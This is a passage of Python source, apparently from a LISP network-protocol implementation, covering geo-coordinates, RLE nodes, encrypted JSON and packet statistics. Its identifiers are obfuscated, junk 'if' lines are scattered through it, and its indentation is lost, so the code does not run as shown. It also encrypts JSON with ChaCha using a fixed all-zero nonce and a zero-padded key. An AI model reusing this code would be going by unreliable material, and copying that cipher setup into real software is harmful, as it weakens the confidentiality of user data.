geo_str , O00o0OoO = geo_str . split ( "/" )
self . radius = int ( O00o0OoO )
if 3 - 3: i11iIiiIii / I1Ii111
if 40 - 40: OoooooooOO / o0oOOo0O0Ooo + OoOoOO00
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 73 - 73: OOooOOo / Oo0Ooo
OO0ooo = geo_str [ 0 : 4 ]
Oooo0oO00ooO = geo_str [ 4 : 8 ]
if 33 - 33: o0oOOo0O0Ooo * OOooOOo
if 7 - 7: i11iIiiIii . OOooOOo * Ii1I . i1IIi
if 4 - 4: O0 - IiII - II111iiii / iII111i - OOooOOo
if 6 - 6: ooOoO0o + OOooOOo - I1IiiI + OOooOOo
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 16 - 16: OoO0O00 * OoOoOO00 - Oo0Ooo
if 44 - 44: ooOoO0o / OoOoOO00 - O0 + iII111i / iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 - iII111i / O0
if 39 - 39: OoooooooOO * iIii1I11I1II1 - o0oOOo0O0Ooo / O0
self . latitude = int ( OO0ooo [ 0 ] )
self . lat_mins = int ( OO0ooo [ 1 ] )
self . lat_secs = int ( OO0ooo [ 2 ] )
if ( OO0ooo [ 3 ] == "N" ) : self . latitude = - self . latitude
if 29 - 29: I11i % OoOoOO00 - oO0o + II111iiii . II111iiii
if 25 - 25: Oo0Ooo * ooOoO0o % I1Ii111
if 34 - 34: OoOoOO00 / I1Ii111 - ooOoO0o
if 66 - 66: I11i * OoO0O00
self . longitude = int ( Oooo0oO00ooO [ 0 ] )
self . long_mins = int ( Oooo0oO00ooO [ 1 ] )
self . long_secs = int ( Oooo0oO00ooO [ 2 ] )
if ( Oooo0oO00ooO [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 98 - 98: IiII . Oo0Ooo + I1Ii111
if 63 - 63: oO0o * I1IiiI * oO0o
def print_geo ( self ) :
oO0000000 = "N" if self . latitude < 0 else "S"
O00O0 = "E" if self . longitude < 0 else "W"
if 41 - 41: i11iIiiIii . I1IiiI / O0
I1i1iiIII1i1 = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , oO0000000 , abs ( self . longitude ) ,
self . long_mins , self . long_secs , O00O0 )
if 93 - 93: Oo0Ooo % OoOoOO00 . II111iiii
if ( self . no_geo_altitude ( ) == False ) :
I1i1iiIII1i1 += "-" + str ( self . altitude )
if 60 - 60: OoO0O00 - IiII % O0 * I1ii11iIi11i
if 61 - 61: O0
if 51 - 51: I1Ii111 - I11i % o0oOOo0O0Ooo * Oo0Ooo - oO0o + II111iiii
if 7 - 7: oO0o
if 98 - 98: Ii1I + oO0o + i1IIi + IiII % IiII
if ( self . radius != 0 ) : I1i1iiIII1i1 += "/{}" . format ( self . radius )
return ( I1i1iiIII1i1 )
if 79 - 79: oO0o % I11i * I11i . OOooOOo % OoooooooOO
if 71 - 71: iII111i
def geo_url ( self ) :
iIIi1i = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
iIIi1i = "10" if ( iIIi1i == "" or iIIi1i . isdigit ( ) == False ) else iIIi1i
III1iIi111I1 , i1I1ii111 = self . dms_to_decimal ( )
OO0ooo0O = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( III1iIi111I1 , i1I1ii111 , III1iIi111I1 , i1I1ii111 ,
# i1IIi - O0
# i11iIiiIii * I1ii11iIi11i * OoooooooOO
iIIi1i )
return ( OO0ooo0O )
if 83 - 83: iII111i - I1Ii111
if 28 - 28: IiII
def print_geo_url ( self ) :
I1Ii1i111I = self . print_geo ( )
if ( self . radius == 0 ) :
OO0ooo0O = self . geo_url ( )
O0ooo = "<a href='{}'>{}</a>" . format ( OO0ooo0O , I1Ii1i111I )
else :
OO0ooo0O = I1Ii1i111I . replace ( "/" , "-" )
O0ooo = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( OO0ooo0O , I1Ii1i111I )
if 42 - 42: oO0o + Oo0Ooo * I1ii11iIi11i . o0oOOo0O0Ooo / iIii1I11I1II1
return ( O0ooo )
if 9 - 9: I1Ii111 * II111iiii % Ii1I - Ii1I % OoO0O00 % o0oOOo0O0Ooo
if 26 - 26: o0oOOo0O0Ooo - I1IiiI / OoooooooOO / ooOoO0o % iIii1I11I1II1 % I1ii11iIi11i
def dms_to_decimal ( self ) :
IiiI11i1I11I , ii111iI1i , o0i11ii1I1II11 = self . latitude , self . lat_mins , self . lat_secs
I1I1iii1 = float ( abs ( IiiI11i1I11I ) )
I1I1iii1 += float ( ii111iI1i * 60 + o0i11ii1I1II11 ) / 3600
if ( IiiI11i1I11I > 0 ) : I1I1iii1 = - I1I1iii1
o0OO = I1I1iii1
if 66 - 66: i1IIi . IiII / OoOoOO00 / i11iIiiIii
IiiI11i1I11I , ii111iI1i , o0i11ii1I1II11 = self . longitude , self . long_mins , self . long_secs
I1I1iii1 = float ( abs ( IiiI11i1I11I ) )
I1I1iii1 += float ( ii111iI1i * 60 + o0i11ii1I1II11 ) / 3600
if ( IiiI11i1I11I > 0 ) : I1I1iii1 = - I1I1iii1
oOOo000000 = I1I1iii1
return ( ( o0OO , oOOo000000 ) )
if 4 - 4: i1IIi - ooOoO0o
if 14 - 14: i1IIi . OoOoOO00 % I1IiiI / iII111i * i11iIiiIii + O0
def get_distance ( self , geo_point ) :
IIIIi1 = self . dms_to_decimal ( )
iIiiII = geo_point . dms_to_decimal ( )
OoOIiiIIIii1I = vincenty ( IIIIi1 , iIiiII )
return ( OoOIiiIIIii1I . km )
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
def point_in_circle ( self , geo_point ) :
IiIIiI = self . get_distance ( geo_point )
return ( IiIIiI <= self . radius )
if 99 - 99: I1Ii111 . II111iiii * IiII . II111iiii + OoOoOO00
if 36 - 36: OoO0O00 * iII111i % ooOoO0o % OoOoOO00 * I1IiiI % i1IIi
def encode_geo ( self ) :
I1i = socket . htons ( LISP_AFI_LCAF )
O00O00oOO0Oo = socket . htons ( 20 + 2 )
O0OooO00O0 = 0
if 25 - 25: iII111i + I1IiiI / OoO0O00 - I1IiiI / OoooooooOO - ooOoO0o
III1iIi111I1 = abs ( self . latitude )
iiIIII1I1ii = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : O0OooO00O0 |= 0x40
if 92 - 92: I1Ii111 / I1IiiI / I1ii11iIi11i + I11i + Ii1I
i1I1ii111 = abs ( self . longitude )
o0ooO000OO = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : O0OooO00O0 |= 0x20
if 62 - 62: Ii1I / Oo0Ooo . OoO0O00 - OOooOOo
oOOOOoOO0Oo = 0
if ( self . no_geo_altitude ( ) == False ) :
oOOOOoOO0Oo = socket . htonl ( self . altitude )
O0OooO00O0 |= 0x10
if 84 - 84: Oo0Ooo * I1Ii111 - o0oOOo0O0Ooo % Ii1I
O00o0OoO = socket . htons ( self . radius )
if ( O00o0OoO != 0 ) : O0OooO00O0 |= 0x06
if 69 - 69: I11i + OoOoOO00 - i11iIiiIii * O0 % O0
O00Oo000 = struct . pack ( "HBBBBH" , I1i , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , O00O00oOO0Oo )
O00Oo000 += struct . pack ( "BBHBBHBBHIHHH" , O0OooO00O0 , 0 , 0 , III1iIi111I1 , iiIIII1I1ii >> 16 ,
socket . htons ( iiIIII1I1ii & 0x0ffff ) , i1I1ii111 , o0ooO000OO >> 16 ,
socket . htons ( o0ooO000OO & 0xffff ) , oOOOOoOO0Oo , O00o0OoO , 0 , 0 )
if 29 - 29: iIii1I11I1II1 / i11iIiiIii + Oo0Ooo
return ( O00Oo000 )
if 99 - 99: I1IiiI - iII111i * Ii1I - OoOoOO00 / i11iIiiIii - i1IIi
if 46 - 46: I1ii11iIi11i * ooOoO0o
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
O0O00Oo = "BBHBBHBBHIHHH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( lcaf_len < IiIii1i ) : return ( None )
if 4 - 4: I1Ii111 * II111iiii
O0OooO00O0 , I1II1I11Ii1i , oOI1iI1 , III1iIi111I1 , iii1IiI1iI1I , iiIIII1I1ii , i1I1ii111 , oO000o0ooO , o0ooO000OO , oOOOOoOO0Oo , O00o0OoO , I1iIIiii1 , IiiiII = struct . unpack ( O0O00Oo ,
# i1IIi . ooOoO0o
packet [ : IiIii1i ] )
if 52 - 52: I11i + IiII + iII111i + OoOoOO00 - I1IiiI + OoOoOO00
if 5 - 5: II111iiii - Oo0Ooo . o0oOOo0O0Ooo - Ii1I * IiII
if 64 - 64: OoO0O00 . I1IiiI + I1Ii111
if 42 - 42: oO0o + iIii1I11I1II1 / Ii1I - oO0o % oO0o . I1Ii111
IiiiII = socket . ntohs ( IiiiII )
if ( IiiiII == LISP_AFI_LCAF ) : return ( None )
if 88 - 88: Oo0Ooo / Ii1I . OOooOOo * Oo0Ooo
if ( O0OooO00O0 & 0x40 ) : III1iIi111I1 = - III1iIi111I1
self . latitude = III1iIi111I1
iI11111 = ( ( iii1IiI1iI1I << 16 ) | socket . ntohs ( iiIIII1I1ii ) ) / 1000
self . lat_mins = iI11111 / 60
self . lat_secs = iI11111 % 60
if 87 - 87: o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo + I1IiiI
if ( O0OooO00O0 & 0x20 ) : i1I1ii111 = - i1I1ii111
self . longitude = i1I1ii111
oOooo = ( ( oO000o0ooO << 16 ) | socket . ntohs ( o0ooO000OO ) ) / 1000
self . long_mins = oOooo / 60
self . long_secs = oOooo % 60
if 42 - 42: OoO0O00 + i1IIi
self . altitude = socket . ntohl ( oOOOOoOO0Oo ) if ( O0OooO00O0 & 0x10 ) else - 1
O00o0OoO = socket . ntohs ( O00o0OoO )
self . radius = O00o0OoO if ( O0OooO00O0 & 0x02 ) else O00o0OoO * 1000
if 39 - 39: ooOoO0o + Ii1I - oO0o / iII111i % IiII
self . geo_name = None
packet = packet [ IiIii1i : : ]
if 22 - 22: II111iiii
if ( IiiiII != 0 ) :
self . rloc . afi = IiiiII
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 76 - 76: i1IIi
return ( packet )
if 60 - 60: iII111i - I1IiiI * I1ii11iIi11i - i1IIi % I1Ii111 % O0
if 24 - 24: I11i + I11i % I11i
if 63 - 63: i11iIiiIii + iIii1I11I1II1 / oO0o % IiII - O0
if 21 - 21: II111iiii
if 89 - 89: OOooOOo % i11iIiiIii * OoOoOO00 % oO0o / O0 * i1IIi
if 16 - 16: IiII
class lisp_rle_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 42 - 42: i1IIi / Ii1I * I1ii11iIi11i
if 9 - 9: I11i % i1IIi / i1IIi / OoO0O00
def copy_rle_node ( self ) :
IiioOoo = lisp_rle_node ( )
IiioOoo . address . copy_address ( self . address )
IiioOoo . level = self . level
IiioOoo . translated_port = self . translated_port
IiioOoo . rloc_name = self . rloc_name
return ( IiioOoo )
if 46 - 46: I1Ii111 * II111iiii + II111iiii * O0 % II111iiii
if 37 - 37: OOooOOo . iIii1I11I1II1 / O0 . ooOoO0o + OOooOOo - OoooooooOO
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 96 - 96: I1Ii111 / oO0o . I1ii11iIi11i % I1IiiI * OOooOOo
if 99 - 99: i11iIiiIii - I1Ii111
def get_encap_keys ( self ) :
Oo0o = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 4 - 4: o0oOOo0O0Ooo - i11iIiiIii . iIii1I11I1II1 . OOooOOo % IiII
oo0o00OO = self . address . print_address_no_iid ( ) + ":" + Oo0o
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
try :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) : return ( iIi11III [ 1 ] . encrypt_key , iIi11III [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 54 - 54: II111iiii * I1IiiI
if 49 - 49: I1ii11iIi11i
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
class lisp_rle ( ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
if 15 - 15: oO0o
def copy_rle ( self ) :
iI1Ii11 = lisp_rle ( self . rle_name )
for IiioOoo in self . rle_nodes :
iI1Ii11 . rle_nodes . append ( IiioOoo . copy_rle_node ( ) )
if 40 - 40: I1Ii111
iI1Ii11 . build_forwarding_list ( )
return ( iI1Ii11 )
if 77 - 77: II111iiii - o0oOOo0O0Ooo . Ii1I
if 47 - 47: o0oOOo0O0Ooo % OOooOOo + I1Ii111
def print_rle ( self , html , do_formatting ) :
oOOOO0o000OoO = ""
for IiioOoo in self . rle_nodes :
Oo0o = IiioOoo . translated_port
if 64 - 64: ooOoO0o / IiII . I1IiiI
oOo000o0O0O = ""
if ( IiioOoo . rloc_name != None ) :
oOo000o0O0O = IiioOoo . rloc_name
if ( do_formatting ) : oOo000o0O0O = blue ( oOo000o0O0O , html )
oOo000o0O0O = "({})" . format ( oOo000o0O0O )
if 60 - 60: I1IiiI . iIii1I11I1II1
if 42 - 42: iII111i
oo0o00OO = IiioOoo . address . print_address_no_iid ( )
if ( IiioOoo . address . is_local ( ) ) : oo0o00OO = red ( oo0o00OO , html )
oOOOO0o000OoO += "{}{}{}, " . format ( oo0o00OO , "" if Oo0o == 0 else ":" + str ( Oo0o ) , oOo000o0O0O )
if 90 - 90: Ii1I . o0oOOo0O0Ooo
if 3 - 3: oO0o
return ( oOOOO0o000OoO [ 0 : - 2 ] if oOOOO0o000OoO != "" else "" )
if 42 - 42: Oo0Ooo
if 42 - 42: iII111i
def build_forwarding_list ( self ) :
oOOoOoooOo0o = - 1
for IiioOoo in self . rle_nodes :
if ( oOOoOoooOo0o == - 1 ) :
if ( IiioOoo . address . is_local ( ) ) : oOOoOoooOo0o = IiioOoo . level
else :
if ( IiioOoo . level > oOOoOoooOo0o ) : break
if 51 - 51: I1IiiI - OoOoOO00 * I1Ii111 * iIii1I11I1II1
if 5 - 5: i11iIiiIii / o0oOOo0O0Ooo
oOOoOoooOo0o = 0 if oOOoOoooOo0o == - 1 else IiioOoo . level
if 45 - 45: I1Ii111 + OoooooooOO + o0oOOo0O0Ooo * II111iiii
self . rle_forwarding_list = [ ]
for IiioOoo in self . rle_nodes :
if ( IiioOoo . level == oOOoOoooOo0o or ( oOOoOoooOo0o == 0 and
IiioOoo . level == 128 ) ) :
if ( lisp_i_am_rtr == False and IiioOoo . address . is_local ( ) ) :
oo0o00OO = IiioOoo . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( oo0o00OO ) )
continue
if 12 - 12: I1ii11iIi11i / O0
self . rle_forwarding_list . append ( IiioOoo )
if 18 - 18: OoOoOO00 . i11iIiiIii + i1IIi / OoooooooOO - IiII % OoO0O00
if 47 - 47: iII111i % IiII + I1Ii111 * o0oOOo0O0Ooo * OoooooooOO
if 100 - 100: Oo0Ooo / I1IiiI / iII111i / I1Ii111 / oO0o % o0oOOo0O0Ooo
if 16 - 16: I1IiiI + I11i
if 66 - 66: OoooooooOO % II111iiii / I1Ii111 . i11iIiiIii
class lisp_json ( ) :
def __init__ ( self , name , string , encrypted = False , ms_encrypt = False ) :
self . json_name = name
self . json_string = string
self . json_encrypted = False
if 67 - 67: Ii1I + Oo0Ooo - I1IiiI - IiII + oO0o + Oo0Ooo
if 84 - 84: I1ii11iIi11i % oO0o - OOooOOo * Ii1I
if 78 - 78: i1IIi / ooOoO0o / oO0o
if 21 - 21: IiII % Ii1I + OOooOOo + IiII
if 90 - 90: o0oOOo0O0Ooo
if 38 - 38: OoOoOO00 / OOooOOo % OoooooooOO * I1ii11iIi11i
if 7 - 7: I11i * O0 + Oo0Ooo / O0 * oO0o + i11iIiiIii
if 74 - 74: OoOoOO00
if 91 - 91: i11iIiiIii / Ii1I % OOooOOo % O0 - I11i . I11i
if 78 - 78: i1IIi + I11i % OoooooooOO + i1IIi + iII111i % Ii1I
if ( len ( lisp_ms_json_keys ) != 0 ) :
if ( ms_encrypt == False ) : return
self . json_key_id = lisp_ms_json_keys . keys ( ) [ 0 ]
self . json_key = lisp_ms_json_keys [ self . json_key_id ]
self . encrypt_json ( )
if 87 - 87: ooOoO0o . iIii1I11I1II1
if 99 - 99: Ii1I + OoooooooOO * IiII * i11iIiiIii - iIii1I11I1II1
if ( lisp_log_id == "lig" and encrypted ) :
o0Oo = os . getenv ( "LISP_JSON_KEY" )
if ( o0Oo != None ) :
ooo = - 1
if ( o0Oo [ 0 ] == "[" and "]" in o0Oo ) :
ooo = o0Oo . find ( "]" )
self . json_key_id = int ( o0Oo [ 1 : ooo ] )
if 58 - 58: IiII % i1IIi . i11iIiiIii
self . json_key = o0Oo [ ooo + 1 : : ]
if 5 - 5: OoOoOO00
self . decrypt_json ( )
if 75 - 75: OOooOOo
if 60 - 60: ooOoO0o - II111iiii - iIii1I11I1II1
if 23 - 23: I1ii11iIi11i
if 68 - 68: OoO0O00 . oO0o / IiII - II111iiii % Oo0Ooo
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 24 - 24: II111iiii / I1ii11iIi11i + oO0o / Ii1I + IiII % oO0o
if 86 - 86: I1IiiI
def delete ( self ) :
if ( lisp_json_list . has_key ( self . json_name ) ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 83 - 83: I11i % Ii1I + IiII % I11i / i1IIi . oO0o
if 56 - 56: I1Ii111 - OOooOOo % o0oOOo0O0Ooo
if 30 - 30: I1Ii111 % i1IIi
def print_json ( self , html ) :
OOi11iiiiI = self . json_string
IiiiIi = "***"
if ( html ) : IiiiIi = red ( IiiiIi , html )
IIiIiI11 = IiiiIi + self . json_string + IiiiIi
if ( self . valid_json ( ) ) : return ( OOi11iiiiI )
return ( IIiIiI11 )
if 24 - 24: i1IIi
if 93 - 93: OoOoOO00 - Oo0Ooo + iIii1I11I1II1 % iIii1I11I1II1 / I1ii11iIi11i - I1Ii111
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo / i11iIiiIii * iII111i / OoOoOO00 . I1IiiI
return ( True )
if 23 - 23: I1IiiI . iII111i % i1IIi
if 92 - 92: o0oOOo0O0Ooo % i1IIi / OoooooooOO * OoooooooOO / iIii1I11I1II1
def encrypt_json ( self ) :
II11iI11i1 = self . json_key . zfill ( 32 )
OO000OOOo0Oo = "0" * 8
if 7 - 7: IiII / OOooOOo + Oo0Ooo . I1IiiI
i1i1ii = json . loads ( self . json_string )
for o0Oo in i1i1ii :
Oo00OO0OO = i1i1ii [ o0Oo ]
Oo00OO0OO = chacha . ChaCha ( II11iI11i1 , OO000OOOo0Oo ) . encrypt ( Oo00OO0OO )
i1i1ii [ o0Oo ] = binascii . hexlify ( Oo00OO0OO )
if 10 - 10: o0oOOo0O0Ooo / I1IiiI . OOooOOo
self . json_string = json . dumps ( i1i1ii )
self . json_encrypted = True
if 10 - 10: I11i - OoOoOO00
if 49 - 49: I1ii11iIi11i / II111iiii - ooOoO0o / I1Ii111 - oO0o
def decrypt_json ( self ) :
II11iI11i1 = self . json_key . zfill ( 32 )
OO000OOOo0Oo = "0" * 8
if 91 - 91: iII111i % Ii1I . IiII + ooOoO0o % i1IIi . II111iiii
i1i1ii = json . loads ( self . json_string )
for o0Oo in i1i1ii :
Oo00OO0OO = binascii . unhexlify ( i1i1ii [ o0Oo ] )
i1i1ii [ o0Oo ] = chacha . ChaCha ( II11iI11i1 , OO000OOOo0Oo ) . encrypt ( Oo00OO0OO )
if 19 - 19: OoooooooOO + I1IiiI % Ii1I % II111iiii + o0oOOo0O0Ooo
try :
self . json_string = json . dumps ( i1i1ii )
self . json_encrypted = False
except :
pass
if 91 - 91: IiII
if 36 - 36: ooOoO0o - OoOoOO00 . iIii1I11I1II1 / oO0o % OoooooooOO * iII111i
if 42 - 42: oO0o
if 71 - 71: i11iIiiIii . I1Ii111 % OoO0O00 % I1IiiI
if 46 - 46: IiII + oO0o - ooOoO0o
if 2 - 2: i1IIi / Ii1I % OoO0O00
if 85 - 85: i1IIi % iIii1I11I1II1
class lisp_stats ( ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 10 - 10: O0 . oO0o * I1IiiI
if 21 - 21: OoooooooOO
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 76 - 76: i1IIi * i11iIiiIii / OOooOOo + I1Ii111
if 50 - 50: oO0o % OoOoOO00 + I1IiiI
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . last_increment
return ( Ooo0o0oo0 <= 1 )
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
if 81 - 81: Ii1I - i1IIi % oO0o * Oo0Ooo * OoOoOO00
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . last_increment
return ( Ooo0o0oo0 <= 60 )
if 79 - 79: oO0o + I1IiiI % iII111i + II111iiii % OoO0O00 % iII111i
if 46 - 46: o0oOOo0O0Ooo
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 44 - 44: I11i . oO0o
return ( c1 , c2 )
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
def normalize ( self , count ) :
count = str ( count )
II11 = len ( count )
if ( II11 > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 23 - 23: OoOoOO00
if ( II11 > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 54 - 54: i1IIi / I11i % O0 - Ii1I - Oo0Ooo - OoO0O00
if ( II11 > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 63 - 63: o0oOOo0O0Ooo
return ( count )
if 46 - 46: Oo0Ooo . ooOoO0o + OoOoOO00 - I11i / i11iIiiIii . iII111i
if 80 - 80: II111iiii + OoO0O00 % ooOoO0o + i11iIiiIii
def get_stats ( self , summary , html ) :
I11II = self . last_rate_check
o0o0000OoO0oO = self . last_packet_count
o00O0oOoO = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 48 - 48: iII111i . i11iIiiIii + i11iIiiIii
oO0Oi1Ii1II1IIII = self . last_rate_check - I11II
if ( oO0Oi1Ii1II1IIII == 0 ) :
OOOo0Oo0 = 0
ooo0O0Oo0OOO = 0
else :
OOOo0Oo0 = int ( ( self . packet_count - o0o0000OoO0oO ) / oO0Oi1Ii1II1IIII )
ooo0O0Oo0OOO = ( self . byte_count - o00O0oOoO ) / oO0Oi1Ii1II1IIII
ooo0O0Oo0OOO = ( ooo0O0Oo0OOO * 8 ) / 1000000
ooo0O0Oo0OOO = round ( ooo0O0Oo0OOO , 2 )
if 19 - 19: iII111i * i1IIi / iII111i
if 21 - 21: ooOoO0o / o0oOOo0O0Ooo % I1ii11iIi11i . Ii1I . IiII
if 8 - 8: I1ii11iIi11i / ooOoO0o + II111iiii
if 45 - 45: ooOoO0o - OOooOOo * IiII % iII111i . OoOoOO00 / i11iIiiIii
if 63 - 63: Oo0Ooo * iIii1I11I1II1 / ooOoO0o
III1i = self . normalize ( self . packet_count )
I1i1iiI = self . normalize ( self . byte_count )
if 48 - 48: i11iIiiIii * i11iIiiIii / oO0o
if 25 - 25: iIii1I11I1II1 / iIii1I11I1II1 - OoooooooOO + I1IiiI . OoooooooOO
if 26 - 26: OoooooooOO % iIii1I11I1II1 - IiII
if 3 - 3: oO0o * II111iiii . O0
if 19 - 19: I1IiiI / I1IiiI / Oo0Ooo + oO0o + i1IIi
if ( summary ) :
I1Iii = "<br>" if html else ""
III1i , I1i1iiI = self . stat_colors ( III1i , I1i1iiI , html )
O0o0Oo = "packet-count: {}{}byte-count: {}" . format ( III1i , I1Iii , I1i1iiI )
ii = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( OOOo0Oo0 , ooo0O0Oo0OOO )
if 90 - 90: i11iIiiIii / iIii1I11I1II1
if ( html != "" ) : ii = lisp_span ( O0o0Oo , ii )
else :
iIIIIII1 = str ( OOOo0Oo0 )
IiIi1iiIII = str ( ooo0O0Oo0OOO )
if ( html ) :
III1i = lisp_print_cour ( III1i )
iIIIIII1 = lisp_print_cour ( iIIIIII1 )
I1i1iiI = lisp_print_cour ( I1i1iiI )
IiIi1iiIII = lisp_print_cour ( IiIi1iiIII )
if 23 - 23: ooOoO0o + ooOoO0o . I11i
I1Iii = "<br>" if html else ", "
if 90 - 90: I1Ii111 / iIii1I11I1II1 / oO0o
ii = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( III1i , I1Iii , iIIIIII1 , I1Iii , I1i1iiI , I1Iii ,
# oO0o * OoooooooOO . OOooOOo
IiIi1iiIII )
if 75 - 75: o0oOOo0O0Ooo % iII111i
return ( ii )
if 35 - 35: OoooooooOO / OoOoOO00 * i1IIi * OoOoOO00 % Ii1I
if 50 - 50: IiII - II111iiii
if 10 - 10: OoooooooOO % Ii1I * OOooOOo + IiII * oO0o
if 13 - 13: II111iiii
if 14 - 14: i11iIiiIii . IiII
if 70 - 70: Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
if 49 - 49: iII111i + OoOoOO00
if 33 - 33: ooOoO0o
if 19 - 19: I1Ii111 % IiII
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . rloc_probe_latency = "?/?"
self . recent_rloc_probe_latencies = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
self . multicast_rloc_probe_list = { }
if 94 - 94: I1Ii111 * I1ii11iIi11i * I1ii11iIi11i - o0oOOo0O0Ooo . i11iIiiIii
if ( recurse == False ) : return
if 16 - 16: i1IIi
if 88 - 88: OOooOOo
if 79 - 79: oO0o
if 52 - 52: oO0o + OoO0O00 / OoooooooOO - iIii1I11I1II1 / iII111i - oO0o
if 68 - 68: I1IiiI - OoOoOO00 - iIii1I11I1II1 % i11iIiiIii * OoOoOO00 * OoO0O00
if 97 - 97: OoO0O00 - IiII + ooOoO0o % iIii1I11I1II1 % iII111i
O000ooo00 = lisp_get_default_route_next_hops ( )
if ( O000ooo00 == [ ] or len ( O000ooo00 ) == 1 ) : return
if 22 - 22: Oo0Ooo . I11i + OOooOOo
self . rloc_next_hop = O000ooo00 [ 0 ]
IiI1i11iiII = self
for Oo00 in O000ooo00 [ 1 : : ] :
OOoooOooOO = lisp_rloc ( False )
OOoooOooOO = copy . deepcopy ( self )
OOoooOooOO . rloc_next_hop = Oo00
IiI1i11iiII . next_rloc = OOoooOooOO
IiI1i11iiII = OOoooOooOO
if 69 - 69: i11iIiiIii * I1IiiI - o0oOOo0O0Ooo
if 89 - 89: ooOoO0o * Ii1I * Oo0Ooo * O0
